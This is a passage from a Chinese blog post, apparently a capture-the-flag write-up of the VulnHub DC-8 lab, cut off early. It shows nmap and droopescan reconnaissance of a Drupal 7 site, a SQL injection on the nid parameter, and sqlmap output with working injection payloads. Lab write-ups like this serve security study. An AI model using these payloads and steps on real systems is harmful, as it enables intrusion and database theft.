<!DOCTYPE html>
<html lang=zh>
<head><meta name="generator" content="Hexo 3.8.0">
    <!-- so meta -->
<script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<script>
  (adsbygoogle = window.adsbygoogle || []).push({
    google_ad_client: "ca-pub-8217582216393706",
    enable_page_level_ads: true
  });
</script>
<!-- <br> -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="description" content="DC: 8-Write-up下载地址：点我 哔哩哔哩：点我 信息收集 确定网段，找到虚拟机的IP，扫端口和服务。  1234567891011121314151617181920212223242526272829303132➜  ~ nmap -sn 192.168.116.1/24Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-21 22:">
<meta name="keywords" content="CTF">
<meta property="og:type" content="article">
<meta property="og:title" content="DC: 8-Write-up">
<meta property="og:url" content="https://blog.kali-team.cn/2019/09/21/DC-8-Write-up/index.html">
<meta property="og:site_name" content="Kali-Team">
<meta property="og:description" content="DC: 8-Write-up下载地址：点我 哔哩哔哩：点我 信息收集 确定网段，找到虚拟机的IP，扫端口和服务。  1234567891011121314151617181920212223242526272829303132➜  ~ nmap -sn 192.168.116.1/24Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-21 22:">
<meta property="og:locale" content="zh-CN">
<meta property="og:updated_time" content="2019-09-22T09:27:46.184Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="DC: 8-Write-up">
<meta name="twitter:description" content="DC: 8-Write-up下载地址：点我 哔哩哔哩：点我 信息收集 确定网段，找到虚拟机的IP，扫端口和服务。  1234567891011121314151617181920212223242526272829303132➜  ~ nmap -sn 192.168.116.1/24Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-21 22:">
    
    
        
          
              <link rel="shortcut icon" href="https://www.gravatar.com/avatar/bc985422e4fd51abac5af2691ee33a93?s=16">
          
        
        
          
            <link rel="icon" type="image/png" href="https://www.gravatar.com/avatar/bc985422e4fd51abac5af2691ee33a93?s=192" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="https://www.gravatar.com/avatar/bc985422e4fd51abac5af2691ee33a93?s=180">
          
        
    
    <!-- title -->
    <title>DC: 8-Write-up</title>
    <!-- styles -->
    <link rel="stylesheet" href="/css/style.css">
    <!-- persian styles -->
    
      <link rel="stylesheet" href="/css/rtl.css">
    
    <!-- rss -->
    
    
</head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="https://www.yuque.com/kali-team">项目</a></li>
         
          <li><a href="/search/">搜索</a></li>
        
      </ul>
    </span>
    <br>
    <span id="actions">
      <ul>
        
        
        <li><a class="icon" href="/2019/09/20/Prime-Series-Level-1-Write-up/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=https://blog.kali-team.cn/2019/09/21/DC-8-Write-up/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=https://blog.kali-team.cn/2019/09/21/DC-8-Write-up/&text=DC: 8-Write-up"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=https://blog.kali-team.cn/2019/09/21/DC-8-Write-up/&title=DC: 8-Write-up"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=https://blog.kali-team.cn/2019/09/21/DC-8-Write-up/&is_video=false&description=DC: 8-Write-up"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=DC: 8-Write-up&body=Check out this article: https://blog.kali-team.cn/2019/09/21/DC-8-Write-up/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=https://blog.kali-team.cn/2019/09/21/DC-8-Write-up/&title=DC: 8-Write-up"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=https://blog.kali-team.cn/2019/09/21/DC-8-Write-up/&title=DC: 8-Write-up"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=https://blog.kali-team.cn/2019/09/21/DC-8-Write-up/&title=DC: 8-Write-up"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=https://blog.kali-team.cn/2019/09/21/DC-8-Write-up/&title=DC: 8-Write-up"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=https://blog.kali-team.cn/2019/09/21/DC-8-Write-up/&name=DC: 8-Write-up&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#DC-8-Write-up"><span class="toc-number">1.</span> <span class="toc-text">DC: 8-Write-up</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#信息收集"><span class="toc-number">1.1.</span> <span class="toc-text">信息收集</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#漏洞利用"><span class="toc-number">1.2.</span> <span class="toc-text">漏洞利用</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#破解密码"><span class="toc-number">1.3.</span> <span class="toc-text">破解密码</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#上传木马"><span class="toc-number">1.4.</span> <span class="toc-text">上传木马</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#提升权限"><span class="toc-number">1.5.</span> <span class="toc-text">提升权限</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#获取Flag"><span class="toc-number">1.6.</span> <span class="toc-text">获取Flag</span></a></li></ol></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        DC: 8-Write-up
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">Kali-Team</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2019-09-21T14:32:48.529Z" itemprop="datePublished">2019-09-21</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fas fa-archive"></i>
        <a class="category-link" href="/categories/CTF/">CTF</a>
    </div>


      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link" href="/tags/CTF/">CTF</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h1 id="DC-8-Write-up"><a href="#DC-8-Write-up" class="headerlink" title="DC: 8-Write-up"></a>DC: 8-Write-up</h1><p>下载地址：<a href="https://www.vulnhub.com/entry/dc-8,367/" target="_blank" rel="noopener">点我</a></p>
<p>哔哩哔哩：<a href="https://www.bilibili.com/video/av68619068" target="_blank" rel="noopener">点我</a></p>
<h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2><ul>
<li>确定网段，找到虚拟机的IP，扫端口和服务。</li>
</ul>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line">➜  ~ nmap -sn 192.168.116.1/24</span><br><span class="line">Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-21 22:21 CST</span><br><span class="line">Nmap scan report <span class="keyword">for</span> 192.168.116.1</span><br><span class="line">Host is up (0.00075s latency).</span><br><span class="line">Nmap scan report <span class="keyword">for</span> 192.168.116.135</span><br><span class="line">Host is up (0.00038s latency).</span><br><span class="line">Nmap <span class="keyword">done</span>: 256 IP addresses (2 hosts up) scanned <span class="keyword">in</span> 5.16 seconds</span><br><span class="line">➜  ~ nmap -A -T4 192.168.116.135 -p-</span><br><span class="line">Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-21 22:21 CST</span><br><span class="line">Nmap scan report <span class="keyword">for</span> 192.168.116.135</span><br><span class="line">Host is up (0.0063s latency).</span><br><span class="line">Not shown: 65533 closed ports</span><br><span class="line">PORT   STATE SERVICE VERSION</span><br><span class="line">22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)</span><br><span class="line">| ssh-hostkey: </span><br><span class="line">|   2048 35:a7:e6:c4:a8:3c:63:1d:e1:c0:ca:a3:66:bc:88:bf (RSA)</span><br><span class="line">|   256 ab:ef:9f:69:ac:ea:54:c6:8c:61:55:49:0a:e7:aa:d9 (ECDSA)</span><br><span class="line">|_  256 7a:b2:c6:87:ec:93:76:d4:ea:59:4b:1b:c6:e8:73:f2 (ED25519)</span><br><span class="line">80/tcp open  http    Apache httpd</span><br><span class="line">|_http-generator: Drupal 7 (http://drupal.org)</span><br><span class="line">| http-robots.txt: 36 disallowed entries (15 shown)</span><br><span class="line">| /includes/ /misc/ /modules/ /profiles/ /scripts/ </span><br><span class="line">| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt </span><br><span class="line">| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt </span><br><span class="line">|_/LICENSE.txt /MAINTAINERS.txt</span><br><span class="line">|_http-server-header: Apache</span><br><span class="line">|_http-title: Welcome to DC-8 | DC-8</span><br><span class="line">Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel</span><br><span class="line"></span><br><span class="line">Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</span><br><span class="line">Nmap <span class="keyword">done</span>: 1 IP address (1 host up) scanned <span class="keyword">in</span> 10.68 seconds</span><br><span class="line">➜  ~</span><br></pre></td></tr></table></figure>
<ul>
<li>IP为：192.168.116.135，发现开放了ssh和http服务，Drupal 7，nmap也扫出了robots.txt文件，信息有点多，<code>http://192.168.116.135/robots.txt</code>，php文件有下面几个：</li>
</ul>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">Disallow: /cron.php</span><br><span class="line">Disallow: /install.php</span><br><span class="line">Disallow: /update.php</span><br><span class="line">Disallow: /xmlrpc.php</span><br></pre></td></tr></table></figure>
<ul>
<li>URL格式好像是路由的有下面几个：</li>
</ul>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">Disallow: /admin/</span><br><span class="line">Disallow: /comment/reply/</span><br><span class="line">Disallow: /filter/tips/</span><br><span class="line">Disallow: /node/add/</span><br><span class="line">Disallow: /search/</span><br><span class="line">Disallow: /user/register/</span><br><span class="line">Disallow: /user/password/</span><br><span class="line">Disallow: /user/login/</span><br><span class="line">Disallow: /user/logout/</span><br><span class="line"></span><br><span class="line">Disallow: /?q=admin/</span><br><span class="line">Disallow: /?q=comment/reply/</span><br><span class="line">Disallow: /?q=filter/tips/</span><br><span class="line">Disallow: /?q=node/add/</span><br><span class="line">Disallow: /?q=search/</span><br><span class="line">Disallow: /?q=user/password/</span><br><span class="line">Disallow: /?q=user/register/</span><br><span class="line">Disallow: /?q=user/login/</span><br><span class="line">Disallow: /?q=user/logout/</span><br></pre></td></tr></table></figure>
<ul>
<li>Drupal 7.67, 2019-05-08 版本还比较新，<code>http://192.168.116.135/CHANGELOG.txt</code>，扫过没发现什么东西。</li>
</ul>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line">➜  ~ droopescan scan drupal -u 192.168.116.135 </span><br><span class="line">[+] Plugins found:                                                              </span><br><span class="line">    ctools http://192.168.116.135/sites/all/modules/ctools/</span><br><span class="line">        http://192.168.116.135/sites/all/modules/ctools/LICENSE.txt</span><br><span class="line">        http://192.168.116.135/sites/all/modules/ctools/API.txt</span><br><span class="line">    views http://192.168.116.135/sites/all/modules/views/</span><br><span class="line">        http://192.168.116.135/sites/all/modules/views/README.txt</span><br><span class="line">        http://192.168.116.135/sites/all/modules/views/LICENSE.txt</span><br><span class="line">    webform http://192.168.116.135/sites/all/modules/webform/</span><br><span class="line">        http://192.168.116.135/sites/all/modules/webform/LICENSE.txt</span><br><span class="line">    ckeditor http://192.168.116.135/sites/all/modules/ckeditor/</span><br><span class="line">        http://192.168.116.135/sites/all/modules/ckeditor/CHANGELOG.txt</span><br><span class="line">        http://192.168.116.135/sites/all/modules/ckeditor/README.txt</span><br><span class="line">        http://192.168.116.135/sites/all/modules/ckeditor/LICENSE.txt</span><br><span class="line">    better_formats http://192.168.116.135/sites/all/modules/better_formats/</span><br><span class="line">        http://192.168.116.135/sites/all/modules/better_formats/README.txt</span><br><span class="line">        http://192.168.116.135/sites/all/modules/better_formats/LICENSE.txt</span><br><span class="line">    image http://192.168.116.135/modules/image/</span><br><span class="line">    profile http://192.168.116.135/modules/profile/</span><br><span class="line">    php http://192.168.116.135/modules/php/</span><br><span class="line"></span><br><span class="line">[+] Themes found:</span><br><span class="line">    seven http://192.168.116.135/themes/seven/</span><br><span class="line">    garland http://192.168.116.135/themes/garland/</span><br><span class="line"></span><br><span class="line">[+] Possible version(s):</span><br><span class="line">    7.67</span><br><span class="line"></span><br><span class="line">[+] Possible interesting urls found:</span><br><span class="line">    Default changelog file - http://192.168.116.135/CHANGELOG.txt</span><br><span class="line">    Default admin - http://192.168.116.135/user/login</span><br><span class="line"></span><br><span class="line">[+] Scan finished (0:00:42.200148 elapsed)</span><br><span class="line">➜  ~</span><br></pre></td></tr></table></figure>
<ul>
<li>突然加一个单引号报错了，发现一个SQL注入，<code>http://192.168.116.135/?nid=1%27</code></li>
</ul>
<figure class="highlight vhdl"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">PDOException: SQLSTATE[<span class="number">42000</span>]: Syntax <span class="literal">error</span> <span class="keyword">or</span> <span class="keyword">access</span> violation: <span class="number">1064</span> You have an <span class="literal">error</span> <span class="keyword">in</span> your SQL syntax; check the manual that corresponds <span class="keyword">to</span> your MariaDB server version <span class="keyword">for</span> the right syntax <span class="keyword">to</span> <span class="keyword">use</span> near ''' at <span class="literal">line</span> <span class="number">1</span>: <span class="keyword">SELECT</span> title FROM node WHERE nid = <span class="number">1</span>'; <span class="keyword">Array</span> ( ) <span class="keyword">in</span> mypages_init() (<span class="literal">line</span> <span class="number">6</span> <span class="keyword">of</span> /var/www/html/sites/<span class="keyword">all</span>/modules/mypages/mypages.module).</span><br></pre></td></tr></table></figure>
<h2 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h2><ul>
<li>丢进sqlmap跑。</li>
</ul>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br></pre></td><td class="code"><pre><span class="line">➜  ~ sqlmap -u <span class="string">"http://192.168.116.135/?nid=1"</span> --batch </span><br><span class="line">        ___</span><br><span class="line">       __H__</span><br><span class="line"> ___ ___[(]_____ ___ ___  &#123;1.3.8<span class="comment">#stable&#125;</span></span><br><span class="line">|_ -| . [)]     | .<span class="string">'| . |</span></span><br><span class="line"><span class="string">|___|_  [,]_|_|_|__,|  _|</span></span><br><span class="line"><span class="string">      |_|V...       |_|   http://sqlmap.org</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user'</span>s responsibility to obey all applicable <span class="built_in">local</span>, state and federal laws. Developers assume no liability and are not responsible <span class="keyword">for</span> any misuse or damage caused by this program</span><br><span class="line"></span><br><span class="line">[*] starting @ 00:07:13 /2019-09-22/</span><br><span class="line"></span><br><span class="line">[00:07:13] [INFO] testing connection to the target URL</span><br><span class="line">[00:07:13] [INFO] checking <span class="keyword">if</span> the target is protected by some kind of WAF/IPS</span><br><span class="line">[00:07:13] [INFO] testing <span class="keyword">if</span> the target URL content is stable</span><br><span class="line">[00:07:13] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or <span class="keyword">in</span> <span class="keyword">case</span> of junk results, refer to user<span class="string">'s manual paragraph '</span>Page comparison<span class="string">'</span></span><br><span class="line"><span class="string">how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C</span></span><br><span class="line"><span class="string">[00:07:13] [INFO] testing if GET parameter '</span>nid<span class="string">' is dynamic</span></span><br><span class="line"><span class="string">[00:07:13] [WARNING] GET parameter '</span>nid<span class="string">' does not appear to be dynamic</span></span><br><span class="line"><span class="string">[00:07:13] [INFO] heuristic (basic) test shows that GET parameter '</span>nid<span class="string">' might be injectable (possible DBMS: '</span>MySQL<span class="string">')</span></span><br><span class="line"><span class="string">[00:07:14] [INFO] heuristic (XSS) test shows that GET parameter '</span>nid<span class="string">' might be vulnerable to cross-site scripting (XSS) attacks</span></span><br><span class="line"><span class="string">[00:07:14] [INFO] testing for SQL injection on GET parameter '</span>nid<span class="string">'</span></span><br><span class="line"><span class="string">it looks like the back-end DBMS is '</span>MySQL<span class="string">'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y</span></span><br><span class="line"><span class="string">for the remaining tests, do you want to include all tests for '</span>MySQL<span class="string">' extending provided level (1) and risk (1) values? [Y/n] Y</span></span><br><span class="line"><span class="string">[00:07:14] [INFO] testing '</span>AND boolean-based blind - WHERE or HAVING clause<span class="string">'</span></span><br><span class="line"><span class="string">[00:07:14] [WARNING] reflective value(s) found and filtering out</span></span><br><span class="line"><span class="string">[00:07:14] [INFO] GET parameter '</span>nid<span class="string">' appears to be '</span>AND boolean-based blind - WHERE or HAVING clause<span class="string">' injectable (with --string="Status message")</span></span><br><span class="line"><span class="string">[00:07:14] [INFO] testing '</span>MySQL &gt;= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)<span class="string">'</span></span><br><span class="line"><span class="string">[00:07:14] [INFO] testing '</span>MySQL &gt;= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)<span class="string">'</span></span><br><span class="line"><span class="string">[00:07:14] [INFO] testing '</span>MySQL &gt;= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)<span class="string">'</span></span><br><span class="line"><span class="string">[00:07:14] [INFO] testing '</span>MySQL &gt;= 5.5 OR error-based - WHERE or HAVING clause (EXP)<span class="string">'</span></span><br><span class="line"><span class="string">[00:07:14] [INFO] testing '</span>MySQL &gt;= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)<span class="string">'</span></span><br><span class="line"><span class="string">[00:07:14] [WARNING] potential permission problems detected ('</span><span class="built_in">command</span> denied<span class="string">')</span></span><br><span class="line"><span class="string">[00:07:14] [INFO] testing '</span>MySQL &gt;= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)<span class="string">'</span></span><br><span class="line"><span class="string">[00:07:14] [INFO] testing '</span>MySQL &gt;= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<span class="string">'</span></span><br><span class="line"><span class="string">[00:07:14] [INFO] GET parameter '</span>nid<span class="string">' is '</span>MySQL &gt;= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<span class="string">' injectable </span></span><br><span class="line"><span class="string">[00:07:14] [INFO] testing '</span>MySQL inline queries<span class="string">'</span></span><br><span class="line"><span class="string">[00:07:14] [INFO] testing '</span>MySQL &gt; 5.0.11 stacked queries (comment)<span class="string">'</span></span><br><span class="line"><span class="string">[00:07:14] [WARNING] time-based comparison requires larger statistical model, please wait.............. (done)                                                                                                                                </span></span><br><span class="line"><span class="string">[00:07:15] [INFO] testing '</span>MySQL &gt; 5.0.11 stacked queries<span class="string">'</span></span><br><span class="line"><span class="string">[00:07:15] [INFO] testing '</span>MySQL &gt; 5.0.11 stacked queries (query SLEEP - comment)<span class="string">'</span></span><br><span class="line"><span class="string">[00:07:15] [INFO] testing '</span>MySQL &gt; 5.0.11 stacked queries (query SLEEP)<span class="string">'</span></span><br><span class="line"><span class="string">[00:07:15] [INFO] testing '</span>MySQL &lt; 5.0.12 stacked queries (heavy query - comment)<span class="string">'</span></span><br><span class="line"><span class="string">[00:07:15] [INFO] testing '</span>MySQL &lt; 5.0.12 stacked queries (heavy query)<span class="string">'</span></span><br><span class="line"><span class="string">[00:07:15] [INFO] testing '</span>MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP)<span class="string">'</span></span><br><span class="line"><span class="string">[00:07:25] [INFO] GET parameter '</span>nid<span class="string">' appears to be '</span>MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP)<span class="string">' injectable </span></span><br><span class="line"><span class="string">[00:07:25] [INFO] testing '</span>Generic UNION query (NULL) - 1 to 20 columns<span class="string">'</span></span><br><span class="line"><span class="string">[00:07:25] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found</span></span><br><span class="line"><span class="string">[00:07:25] [INFO] '</span>ORDER BY<span class="string">' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test</span></span><br><span class="line"><span class="string">[00:07:25] [INFO] target URL appears to have 1 column in query</span></span><br><span class="line"><span class="string">[00:07:25] [INFO] GET parameter '</span>nid<span class="string">' is '</span>Generic UNION query (NULL) - 1 to 20 columns<span class="string">' injectable</span></span><br><span class="line"><span class="string">GET parameter '</span>nid<span class="string">' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N</span></span><br><span class="line"><span class="string">sqlmap identified the following injection point(s) with a total of 47 HTTP(s) requests:</span></span><br><span class="line"><span class="string">---</span></span><br><span class="line"><span class="string">Parameter: nid (GET)</span></span><br><span class="line"><span class="string">    Type: boolean-based blind</span></span><br><span class="line"><span class="string">    Title: AND boolean-based blind - WHERE or HAVING clause</span></span><br><span class="line"><span class="string">    Payload: nid=1 AND 7434=7434</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    Type: error-based</span></span><br><span class="line"><span class="string">    Title: MySQL &gt;= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)</span></span><br><span class="line"><span class="string">    Payload: nid=1 AND (SELECT 5822 FROM(SELECT COUNT(*),CONCAT(0x716b767871,(SELECT (ELT(5822=5822,1))),0x7178717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    Type: time-based blind</span></span><br><span class="line"><span class="string">    Title: MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP)</span></span><br><span class="line"><span class="string">    Payload: nid=1 AND (SELECT 6066 FROM (SELECT(SLEEP(5)))jOuH)</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    Type: UNION query</span></span><br><span class="line"><span class="string">    Title: Generic UNION query (NULL) - 1 column</span></span><br><span class="line"><span class="string">    Payload: nid=-9086 UNION ALL SELECT CONCAT(0x716b767871,0x635349446c7871725473696250696f6e57684163546277736a706a416479444c736e424d6669744e,0x7178717671)-- KIcF</span></span><br><span class="line"><span class="string">---</span></span><br><span class="line"><span class="string">[00:07:25] [INFO] the back-end DBMS is MySQL</span></span><br><span class="line"><span class="string">web application technology: Apache</span></span><br><span class="line"><span class="string">back-end DBMS: MySQL &gt;= 5.0</span></span><br><span class="line"><span class="string">[00:07:25] [WARNING] HTTP error codes detected during run:</span></span><br><span class="line"><span class="string">500 (Internal Server Error) - 23 times</span></span><br><span class="line"><span class="string">[00:07:25] [INFO] fetched data logged to text files under '</span>/home/kali-team/.sqlmap/output/192.168.116.135<span class="string">'</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">[*] ending @ 00:07:25 /2019-09-22/</span></span><br></pre></td></tr></table></figure>
<ul>
<li>找到邮箱和密码dump出来</li>
</ul>
<figure class="highlight sqf"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span 